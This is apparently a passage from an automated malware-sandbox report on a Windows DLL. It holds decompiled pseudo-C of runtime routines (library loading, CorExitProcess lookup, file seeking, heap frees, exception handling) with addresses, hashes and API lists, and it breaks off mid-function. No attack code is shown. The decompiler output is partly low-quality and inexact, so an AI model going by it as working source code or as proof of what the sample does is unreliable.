0x6e52d8f4
0x6e52d8fb
0x6e52d8fb
0x6e52d903
0x6e52d86d
0x6e52d86d
0x6e52d870
0x6e52d874
0x6e52d878
0x6e52d885
0x6e52d88d
0x6e52d88f
0x00000000
0x6e52d88f
0x6e52d856
0x6e52d856
0x00000000
0x6e52d856
0x6e52d854

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E52D827

Part of subcall function 6E4F8420: std::_Lockit::_Lockit.LIBCPMT ref: 6E4F842F
Part of subcall function 6E4F8420: std::_Lockit::~_Lockit.LIBCPMT ref: 6E4F844A

codecvt.LIBCPMT ref: 6E52D861
std::_Facet_Register.LIBCPMT ref: 6E52D878
std::_Lockit::~_Lockit.LIBCPMT ref: 6E52D898

Strings

\dan, xrefs: 6E52D8B2

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Registercodecvt
String ID: \dan
API String ID: 2219260569-967645763
Opcode ID: de85a7a30b22690e02ace0e593caec44ef811b5ab0020ca1ca21b97dc01d351f
Instruction ID: 70c7b466108917c0bf7777499cdb79a047ef27fed0465d1625b2f63f4f5764c6
Opcode Fuzzy Hash: de85a7a30b22690e02ace0e593caec44ef811b5ab0020ca1ca21b97dc01d351f
Instruction Fuzzy Hash: AE21B175A006119FCB45CFAAC490AAEB7F5AFCA714B15856EDA049B3D0DB30EC02CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E5335C2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E5335C2(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6e68b44c + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6e624ce8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6E53F42A(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6e5335c9
0x6e53363d
0x6e5335ce
0x6e5335d0
0x6e5335d7
0x6e5335db
0x6e5335e4
0x6e5335f3
0x6e5335fc
0x6e533600
0x6e533649
0x6e53364b
0x6e53364f
0x6e533652
0x6e533652
0x6e533658
0x6e533658
0x6e533644
0x6e533648
0x6e533648
0x6e533602
0x6e53360b
0x6e533635
0x6e533638
0x6e53363a
0x6e53363a
0x00000000
0x6e53363a
0x6e53360d
0x6e533618
0x6e53361d
0x6e533622
0x00000000
0x00000000
0x6e533629
0x6e53362f
0x6e533633
0x00000000
0x00000000
0x00000000
0x6e533633
0x6e5335e0
0x00000000
0x00000000
0x00000000
0x6e5335e2
0x6e533642
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E533683,00000000,?,00000001,00000000,?,6E5336FA,00000001,FlsFree,6E624D98,6E624DA0,00000000), ref: 6E533652

Strings

api-ms-, xrefs: 6E533612

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: e112d566d4f33706cf3ce3460f031c13e05612e67d0b32ac8accef612edce18b
Instruction ID: d3253de8f6b48737847356b2b9dcf31ce5562277e1fabf1a37138e8d35c066a2
Opcode Fuzzy Hash: e112d566d4f33706cf3ce3460f031c13e05612e67d0b32ac8accef612edce18b
Instruction Fuzzy Hash: F211E335A95631AFDB138AED8C4979D73E89B02771F314621E920E7380E770ED018AE4

Uniqueness

Uniqueness Score: -1.00%

Function 6E537AFF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6E537AFF(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6e61623c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6e537b05
0x6e537b09
0x6e537b14
0x6e537b1c
0x6e537b27
0x6e537b2d
0x6e537b31
0x6e537b38
0x6e537b3e
0x6e537b3e
0x6e537b40
0x6e537b45
0x00000000
0x6e537b4a
0x6e537b51

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E537AB1,?,?,6E537A79,6E53413C,?,?), ref: 6E537B14
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E537B27
FreeLibrary.KERNEL32(00000000,?,?,6E537AB1,?,?,6E537A79,6E53413C,?,?), ref: 6E537B4A

Strings

CorExitProcess, xrefs: 6E537B1F
mscoree.dll, xrefs: 6E537B0D

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 28628a5c2c085f7b178247956ea67710362dd1ada2579f24d44caba42f353e84
Instruction ID: a096dad2de7c66021136e92f42ebf6826c153b8fc24325347307cd52ea63ad2b
Opcode Fuzzy Hash: 28628a5c2c085f7b178247956ea67710362dd1ada2579f24d44caba42f353e84
Instruction Fuzzy Hash: 32F08234951529FBDF029BD6C91AFEE7BB4EB00352F100065E405A2290DB30DB00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E53F735, Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6E53F735(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t17;
				signed int _t19;
				void* _t21;
				union _LARGE_INTEGER* _t25;

				_t25 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t19 = E6E537E39(GetLastError());
					L7:
					return _t19 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t17 = SetFilePointerEx(_a4, _a8, _t25,  &_v12);
				__eflags = _t17;
				if(_t17 == 0) {
					goto L1;
				}
				_t21 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t19 = E6E537E6F(__eflags);
						 *_t19 = 0x16;
						goto L7;
					}
					__eflags = _t21 - 0x7fffffff;
					if(__eflags > 0) {
						goto L6;
					}
				}
				return _t21;
			}

0x6e53f735
0x6e53f741
0x6e53f753
0x6e53f755
0x6e53f75c
0x6e53f7b1
0x00000000
0x6e53f7b1
0x6e53f764
0x6e53f76e
0x6e53f774
0x6e53f777
0x6e53f77a
0x6e53f780
0x6e53f782
0x00000000
0x00000000
0x6e53f784
0x6e53f787
0x6e53f78a
0x6e53f78c
0x6e53f795
0x6e53f795
0x6e53f7a0
0x6e53f7a6
0x6e53f7ab
0x00000000
0x6e53f7ab
0x6e53f78e
0x6e53f793
0x00000000
0x00000000
0x6e53f793
0x6e53f7b6

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 6E53F74B
GetLastError.KERNEL32(?,?,?), ref: 6E53F755
__dosmaperr.LIBCMT ref: 6E53F75C
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 6E53F77A
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 6E53F7A0

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: bc840c713d5173859a76245ed2c781f714b15cb6400133bc0c8de8e11547dc4c
Instruction ID: df9f53b4477010425f29fb8a9e6fcfe81b89fa41fe696d1bbfdce46250c83530
Opcode Fuzzy Hash: bc840c713d5173859a76245ed2c781f714b15cb6400133bc0c8de8e11547dc4c
Instruction Fuzzy Hash: 44011776811129FBDF119FA6CC488DF7FBDEF42764F208505B92596290E7328A40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E54D857, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E54D857(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e688c80; // 0x6e688cd4
					if(_t23 != 0) {
						E6E541B83(_t7);
					}
					_t2 = _t21 + 4; // 0x36616
					_t24 =  *_t2 -  *0x6e688c84; // 0x6e68b479
					if(_t24 != 0) {
						E6E541B83(_t8);
					}
					_t3 = _t21 + 8; // 0xf28bf88b
					_t25 =  *_t3 -  *0x6e688c88; // 0x6e68b479
					if(_t25 != 0) {
						E6E541B83(_t9);
					}
					_t4 = _t21 + 0x30; // 0x8b50523b
					_t26 =  *_t4 -  *0x6e688cb0; // 0x6e688cd8
					if(_t26 != 0) {
						E6E541B83(_t10);
					}
					_t5 = _t21 + 0x34; // 0x9147e8f1
					_t6 =  *_t5;
					_t27 = _t6 -  *0x6e688cb4; // 0x6e68b47c
					if(_t27 != 0) {
						return E6E541B83(_t6);
					}
				}
				return _t6;
			}

0x6e54d85d
0x6e54d862
0x6e54d866
0x6e54d86c
0x6e54d86f
0x6e54d874
0x6e54d875
0x6e54d878
0x6e54d87e
0x6e54d881
0x6e54d886
0x6e54d887
0x6e54d88a
0x6e54d890
0x6e54d893
0x6e54d898
0x6e54d899
0x6e54d89c
0x6e54d8a2
0x6e54d8a5
0x6e54d8aa
0x6e54d8ab
0x6e54d8ab
0x6e54d8ae
0x6e54d8b4
0x00000000
0x6e54d8bc
0x6e54d8b4
0x6e54d8bf

APIs

_free.LIBCMT ref: 6E54D86F

Part of subcall function 6E541B83: HeapFree.KERNEL32(00000000,00000000,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF), ref: 6E541B99
Part of subcall function 6E541B83: GetLastError.KERNEL32(6E4F6ECF,?,6E54DAF8,6E4F6ECF,00000000,6E4F6ECF,?,?,6E54DD9B,6E4F6ECF,00000007,6E4F6ECF,?,6E54B969,6E4F6ECF,6E4F6ECF), ref: 6E541BAB

_free.LIBCMT ref: 6E54D881
_free.LIBCMT ref: 6E54D893
_free.LIBCMT ref: 6E54D8A5
_free.LIBCMT ref: 6E54D8B7

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a47eadbb046a7ccb665b947e0ee6469a74c42e8658e9969ec23d2eefed611232
Instruction ID: 82fc3e626e524fb559663c6ff0fd9c1872419616bfc501062641caae5c4f6f8b
Opcode Fuzzy Hash: a47eadbb046a7ccb665b947e0ee6469a74c42e8658e9969ec23d2eefed611232
Instruction Fuzzy Hash: C1F0FF72585A05EBCB90DBE9D695C7B73EEAA827207901D15F169D7610DF30FC804BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E532C42, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E532C42(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6E532553(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6E532553(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6E53048F(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6E5303C2(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6E532818(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6E5349C0(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6e532c42
0x6e532c42
0x6e532c49
0x6e532c52
0x6e532d71
0x6e532c58
0x6e532c58
0x6e532c59
0x6e532c5a
0x6e532c64
0x6e532c67
0x6e532c6d
0x6e532c77
0x6e532c9c
0x6e532ca1
0x6e532ca6
0x6e532d6d
0x00000000
0x6e532d6e
0x6e532ca6
0x6e532c77
0x6e532cac
0x6e532caf
0x6e532cb2
0x6e532cb8
0x6e532cbe
0x6e532cd0
0x6e532cd5
0x6e532cd8
0x6e532cdb
0x6e532cde
0x6e532ce1
0x6e532ce7
0x6e532ced
0x6e532cf0
0x6e532cf3
0x6e532d02
0x6e532d03
0x6e532d03
0x6e532d08
0x6e532d1b
0x6e532d1d
0x6e532d22
0x6e532d2d
0x6e532d2f
0x6e532d31
0x6e532d4d
0x6e532d52
0x6e532d55
0x6e532d55
0x6e532d2d
0x6e532d22
0x6e532d5b
0x6e532d5c
0x6e532d5f
0x6e532d62
0x6e532d65
0x6e532d68
0x6e532cf3
0x00000000
0x6e532ce7
0x6e532d72
0x6e532d77
0x6e532d7b
0x6e532d7e
0x6e532d7f
0x6e532d80
0x6e532d81
0x6e532d86
0x6e532dfe
0x6e532e00
0x6e532d88
0x6e532d88
0x6e532d8e
0x00000000
0x6e532d90
0x6e532d93
0x6e532d96
0x6e532d9d
0x6e532da0
0x6e532da4
0x6e532dd6
0x6e532dd9
0x6e532de0
0x6e532de6
0x6e532df0
0x6e532df9
0x6e532df9
0x6e532df0
0x6e532de6
0x6e532dfa
0x6e532da6
0x6e532da6
0x6e532da6
0x6e532da9
0x6e532da9
0x6e532dad
0x00000000
0x00000000
0x6e532db1
0x6e532dc5
0x6e532dc5
0x6e532db3
0x6e532db3
0x6e532db9
0x00000000
0x6e532dbb
0x6e532dbb
0x6e532dbe
0x6e532dc3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e532dc3
0x6e532db9
0x6e532dce
0x6e532dd0
0x00000000
0x6e532dd2
0x6e532dd2
0x6e532dd2
0x00000000
0x6e532dd0
0x6e532dc9
0x6e532dcb
0x00000000
0x6e532dcb
0x00000000
0x00000000
0x00000000
0x6e532d96
0x6e532d8e
0x6e532e01
0x6e532e05
0x6e532e05

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E532C67
CatchIt.LIBVCRUNTIME ref: 6E532D4D

Strings

RCC, xrefs: 6E532C81
MOC, xrefs: 6E532C79

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 3f57703f8fe67ca0d968cb82f715cf58ba1bd9d80a6c339763002be1d734a96c
Instruction ID: ffbd1ea143117504ac8e14266ecf9f8fe927f385ce8b621d515de73565acf82e
Opcode Fuzzy Hash: 3f57703f8fe67ca0d968cb82f715cf58ba1bd9d80a6c339763002be1d734a96c
Instruction Fuzzy Hash: 7141477590061DAFCF02CFD8D980AEEBBF5BF48305F248559FA14A7221E3359A52DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E6084E0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6E608509

Strings

processing, xrefs: 6E6084F8
D/hn, xrefs: 6E608549
%lu:%s:%s:%d:%s, xrefs: 6E608562

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentThread
String ID: %lu:%s:%s:%d:%s$D/hn$processing
API String ID: 2882836952-85016314
Opcode ID: f4f9341bf72019f8e5607c9bcdde9c98226dcf8f436c690ef0955864144922ab
Instruction ID: a8ac613cfd8436704e52fb88d0d611dccaa854b76153782a8bda87bce2da890c
Opcode Fuzzy Hash: f4f9341bf72019f8e5607c9bcdde9c98226dcf8f436c690ef0955864144922ab
Instruction Fuzzy Hash: B1213D72508245ABD715CAA0D945DDBB3ECAF89344F440D2AF689D3111E770EA188BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4F7D60, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E6E4F7D60(void* __ebx, intOrPtr* __ecx, void* __edx, void* _a4) {
				signed int _v0;
				char _v8;
				char _v12;
				char _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				signed int _v52;
				void* _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v104;
				char _v108;
				intOrPtr* _v112;
				intOrPtr _v144;
				void* __edi;
				void* __esi;
				signed int _t78;
				signed int _t86;
				signed int _t87;
				intOrPtr* _t89;
				char _t92;
				void* _t101;
				intOrPtr* _t107;
				intOrPtr _t117;
				void* _t125;
				signed int _t127;
				intOrPtr* _t140;
				intOrPtr _t142;
				intOrPtr _t147;
				signed int _t148;
				void* _t150;
				void* _t151;
				intOrPtr* _t153;
				intOrPtr* _t155;
				intOrPtr* _t158;
				signed int _t160;
				intOrPtr _t161;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr _t164;
				signed int _t168;
				signed int _t169;
				signed int _t172;
				void* _t173;

				_t126 = __ecx;
				_t125 = __ebx;
				_t168 = _t172;
				_push(0xffffffff);
				_push(0x6e6158ef);
				_push( *[fs:0x0]);
				_push(__ecx);
				_t78 =  *0x6e688c24; // 0x8e9367b0
				_push(_t78 ^ _t168);
				 *[fs:0x0] =  &_v16;
				_t158 = __ecx;
				_v20 = __ecx;
				E6E52E4AA(__ecx, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_t16 =  &_a4; // 0x6e4f7a24
				_t83 =  *_t16;
				_v8 = 6;
				if( *_t16 == 0) {
					_push("bad locale name");
					E6E52D6AA(__edx);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t168);
					_t169 = _t172;
					_push(0xffffffff);
					_push(0x6e615925);
					_push( *[fs:0x0]);
					_t173 = _t172 - 0x58;
					_t86 =  *0x6e688c24; // 0x8e9367b0
					_t87 = _t86 ^ _t169;
					_v52 = _t87;
					_push(_t158);
					_push(_t87);
					 *[fs:0x0] =  &_v48;
					_t153 = _t126;
					_v104 = _t153;
					_t89 = _v20;
					_v104 = _t153;
					_v112 = _t89;
					__eflags =  *((intOrPtr*)(_t89 + 0x14)) - 0x10;
					_t127 =  *(_t89 + 0x10);
					_v104 = _t127;
					if( *((intOrPtr*)(_t89 + 0x14)) >= 0x10) {
						_v84 =  *_t89;
					}
					__eflags = _t127 - 0x10;
					if(_t127 >= 0x10) {
						_t160 = _t127 | 0x0000000f;
						__eflags = _t160 - 0x7fffffff;
						_t161 =  >  ? 0x7fffffff : _t160;
						_t31 = _t161 + 1; // 0x1
						_t92 = E6E4F7530(_t125, _t153, _t161);
						__eflags = _v76 + 1;
						_v108 = _t92;
						E6E530AC0(_t92, _v84, _v76 + 1);
						_t127 = _v76;
						_t173 = _t173 + 0xc;
						_v88 = _t161;
					} else {
						asm("movups xmm0, [eax]");
						_v88 = 0xf;
						asm("movups [ebp-0x64], xmm0");
					}
					_t162 = _a4;
					_v92 = _t127;
					_v76 = _v0;
					_v12 = 0;
					__eflags = _t127;
					if(_t127 != 0) {
						_push(2);
						_push(0x6e616328);
						E6E4F88D0(_t125,  &_v108, _t153, _t162, _t169);
					}
					 *((intOrPtr*)( *_t162 + 8))(_v76);
					__eflags = _v28 - 0x10;
					_t100 =  >=  ? _v48 :  &_v48;
					_v12 = 1;
					_t101 = E6E4F88D0(_t125,  &_v108, _t153, _t162, _t169,  >=  ? _v48 :  &_v48, _v32,  &_v48);
					_t147 = _v28;
					__eflags = _t147 - 0x10;
					if(_t147 < 0x10) {
						L14:
						asm("movups xmm1, [ebp-0x64]");
						__eflags = _v88 - 0x10;
						asm("movq xmm0, [ebp-0x54]");
						asm("movd eax, xmm1");
						asm("movq [ebp-0x30], xmm0");
						asm("xorps xmm0, xmm0");
						 *_t153 = 0x6e6162d4;
						_t134 =  >=  ? _t101 :  &_v72;
						asm("movq [edi+0x4], xmm0");
						_v80 =  >=  ? _t101 :  &_v72;
						_v76 = 1;
						asm("movups [ebp-0x40], xmm1");
						E6E530778( &_v80, _t153 + 4);
						_t148 = _v52;
						_t173 = _t173 + 8;
						 *_t153 = 0x6e616314;
						__eflags = _t148 - 0x10;
						if(_t148 < 0x10) {
							L18:
							 *_t153 = 0x6e616320;
							 *((intOrPtr*)(_t153 + 0xc)) = _v0;
